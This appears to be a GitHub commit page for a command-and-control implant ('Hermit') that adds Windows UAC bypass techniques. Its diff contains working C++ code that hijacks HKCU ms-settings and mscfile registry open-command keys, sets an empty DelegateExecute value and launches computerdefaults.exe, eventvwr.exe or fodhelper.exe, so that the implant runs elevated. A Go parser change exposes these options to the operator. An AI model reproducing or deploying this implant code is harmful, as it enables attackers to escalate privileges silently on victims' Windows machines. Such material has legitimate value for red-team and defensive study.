Skip to content

Commit

Permalink
added other UAC Bypass techniques
Browse files Browse the repository at this point in the history
  • Loading branch information
@hideckies
hideckies committed Jul 19, 2024
1 parent 296e700 commit 8706ed7
Show file tree
Hide file tree
Showing 4 changed files with 171 additions and 34 deletions.
9 changes: 9 additions & 0 deletions payload/win/implant/include/core/system.hpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -293,6 +293,15 @@ namespace System::Registry
DWORD dwOptions,
BOOL bRecursive
);
BOOL RegAdd(
Procs::PPROCS pProcs,
HKEY hKeyRoot,
LPCWSTR lpSubKey,
LPCWSTR lpValueName,
DWORD dwType,
const BYTE *lpData,
DWORD dwDataLen
);
}

#endif // HERMIT_CORE_SYSTEM_HPP
47 changes: 47 additions & 0 deletions payload/win/implant/src/core/system/registry.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -123,4 +123,51 @@ namespace System::Registry

return vSubKeys;
}

BOOL RegAdd(
Procs::PPROCS pProcs,
HKEY hKeyRoot,
LPCWSTR lpSubKey,
LPCWSTR lpValueName,
DWORD dwType,
const BYTE *lpData,
DWORD dwDataLen
) {
HKEY hKey;
DWORD d;

if (pProcs->lpRegCreateKeyExW(
hKeyRoot,
lpSubKey,
0,
nullptr,
0,
KEY_WRITE,
nullptr,
&hKey,
&d
) != ERROR_SUCCESS)
{
// return L"Error: Failed to create key.";
return FALSE;
}

if (pProcs->lpRegSetValueExW(
hKey,
lpValueName,
0,
dwType, // REG_SZ,
lpData, // (BYTE*)lpCmd,
dwDataLen // (wcslen(lpCmd) + 1) * sizeof(WCHAR)
) != ERROR_SUCCESS)
{
pProcs->lpRegCloseKey(hKey);
// return L"Error: Failed to set default value for command of ms-settings.";
return FALSE;
}

pProcs->lpRegCloseKey(hKey);

return TRUE;
}
}
147 changes: 113 additions & 34 deletions payload/win/implant/src/core/task/uac.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -11,61 +11,140 @@ namespace Task
{
return L"Error: Failed to get the program path.";
}

LPCWSTR lpSelfPath = wSelfPath;

if (wcscmp(wTechnique.c_str(), L"fodhelper") == 0)
HKEY hKey;
DWORD d;

if (wcscmp(wTechnique.c_str(), L"computerdefaults") == 0)
{
// Reference: https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html
HKEY hKey;
DWORD d;
std::wstring wSubKey = L"Software\\Classes\\ms-settings\\Shell\\Open\\command";
std::wstring wCmd = L"cmd /c start " + std::wstring(wSelfPath);
// Reference: https://github.com/blue0x1/uac-bypass-oneliners
std::wstring wSubKey = L"SOFTWARE\\Classes\\ms-settings\\Shell\\Open\\Command";

// reg add "HKCU\SOFTWARE\Classes\ms-settings\Shell\Open\Command" /ve /t REG_SZ /d "cmd /c start ..."
std::wstring wCmd = std::wstring(wSelfPath);
LPCWSTR lpCmd = wCmd.c_str();
const WCHAR* wDel = L"";
if (!System::Registry::RegAdd(
pState->pProcs,
HKEY_CURRENT_USER,
wSubKey.c_str(),
L"",
REG_SZ,
(BYTE*)lpCmd,
(wcslen(lpCmd) + 1) * sizeof(WCHAR)
)) {
return L"Error: Failed to add registry value for HKCU\\SOFTWARE\\Classes\\ms-settings\\Shell\\Open\\Command.";
}

if (pState->pProcs->lpRegCreateKeyExW(
// reg add "HKCU\SOFTWARE\Classes\ms-settings\Shell\Open\Command" /v DelegateExecute /t REG_SZ /d ""
const WCHAR* wDel = L"";
if (!System::Registry::RegAdd(
pState->pProcs,
HKEY_CURRENT_USER,
wSubKey.c_str(),
0,
nullptr,
0,
KEY_WRITE,
nullptr,
&hKey,
&d
) != ERROR_SUCCESS)
L"DelegateExecute",
REG_SZ,
(BYTE*)wDel,
(wcslen(wDel) + 1) * sizeof(WCHAR)
)) {
return L"Error: Failed to add registry value for DeletegateExecute.";
}

// Start the fodhelper.exe
SHELLEXECUTEINFO sei = {sizeof(sei)};
sei.lpVerb = L"runas";
sei.lpFile = L"C:\\Windows\\System32\\computerdefaults.exe";
sei.hwnd = nullptr;
sei.nShow = SW_NORMAL;

if (!pState->pProcs->lpShellExecuteExW(&sei))
{
return L"Error: Failed to create key: Image File Execution Options\\notepad.exe.";
return L"Error: Failed to execute computerdefaults.exe.";
}

if (pState->pProcs->lpRegSetValueExW(
hKey,
return L"Success: The computerdefaults and another process started successfully.";
}
else if (wcscmp(wTechnique.c_str(), L"eventvwr") == 0)
{
// Reference: https://github.com/blue0x1/uac-bypass-oneliners
std::wstring wSubKey = L"SOFTWARE\\Classes\\mscfile\\Shell\\Open\\Command";

// reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start ..."
std::wstring wCmd = std::wstring(wSelfPath);
LPCWSTR lpCmd = wCmd.c_str();
if (!System::Registry::RegAdd(
pState->pProcs,
HKEY_CURRENT_USER,
wSubKey.c_str(),
L"",
0,
REG_SZ,
(BYTE*)lpCmd,
(wcslen(lpCmd) + 1) * sizeof(WCHAR)
) != ERROR_SUCCESS)
{
pState->pProcs->lpRegCloseKey(hKey);
return L"Error: Failed to set default value for ms-settings command.";
)) {
return L"Error: Failed to add registry value for HKCU\\SOFTWARE\\Classes\\mscfile\\Shell\\Open\\Command.";
}

if (pState->pProcs->lpRegSetValueExW(
hKey,
// reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d ""
const WCHAR* wDel = L"";
if (!System::Registry::RegAdd(
pState->pProcs,
HKEY_CURRENT_USER,
wSubKey.c_str(),
L"DelegateExecute",
0,
REG_SZ,
(BYTE*)wDel,
(wcslen(wDel) + 1) * sizeof(WCHAR)
) != ERROR_SUCCESS)
)) {
return L"Error: Failed to add registry value for DelegateExecute";
}

// Start the eventvwr.exe
SHELLEXECUTEINFO sei = {sizeof(sei)};
sei.lpVerb = L"runas";
sei.lpFile = L"C:\\Windows\\System32\\eventvwr.exe";
sei.hwnd = nullptr;
sei.nShow = SW_NORMAL;

if (!pState->pProcs->lpShellExecuteExW(&sei))
{
pState->pProcs->lpRegCloseKey(hKey);
return L"Error: Failed to set 'DelegateExecute' value for ms-settings command.";
return L"Error: Failed to execute eventvwr.exe.";
}

return L"Success: The eventvwr and another process started successfully.";
}
else if (wcscmp(wTechnique.c_str(), L"fodhelper") == 0)
{
// Reference: https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html
std::wstring wSubKey = L"SOFTWARE\\Classes\\ms-settings\\Shell\\Open\\Command";

// reg add "HKCU\SOFTWARE\Classes\ms-settings\Shell\Open\Command" /ve /t REG_SZ /d "cmd /c start ..."
std::wstring wCmd = std::wstring(wSelfPath);
LPCWSTR lpCmd = wCmd.c_str();
if (!System::Registry::RegAdd(
pState->pProcs,
HKEY_CURRENT_USER,
wSubKey.c_str(),
L"",
REG_SZ,
(BYTE*)lpCmd,
(wcslen(lpCmd) + 1) * sizeof(WCHAR)
)) {
return L"Error: Failed to add registry value for HKCU\\SOFTWARE\\Classes\\ms-settings\\Shell\\Open\\Command.";
}

pState->pProcs->lpRegCloseKey(hKey);
// reg add "HKCU\SOFTWARE\Classes\ms-settings\Shell\Open\Command" /v DelegateExecute /t REG_SZ /d ""
const WCHAR* wDel = L"";
if (!System::Registry::RegAdd(
pState->pProcs,
HKEY_CURRENT_USER,
wSubKey.c_str(),
L"DelegateExecute",
REG_SZ,
(BYTE*)wDel,
(wcslen(wDel) + 1) * sizeof(WCHAR)
)) {
return L"Error: Failed to add registry value for DeletegateExecute.";
}

// Start the fodhelper.exe
SHELLEXECUTEINFO sei = {sizeof(sei)};
Expand All @@ -76,10 +155,10 @@ namespace Task

if (!pState->pProcs->lpShellExecuteExW(&sei))
{
return L"Error: Failed to execute shell.";
return L"Error: Failed to execute fodhelper.exe.";
}

return L"Success: The fodhelper.exe and another process started successfully.";
return L"Success: The fodhelper and another process started successfully.";
}

return L"Error: Invalid technique.";
Expand Down
2 changes: 2 additions & 0 deletions pkg/common/parser/amtaskcommand.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -1143,6 +1143,8 @@ func (c *amTaskUacCmd) Run(
) error {
// Select technique
technique, err := stdin.Select("Technique", []string{
"computerdefaults",
"eventvwr",
"fodhelper",
"(cancel)",
})
Expand Down

0 comments on commit 8706ed7

Please sign in to comment.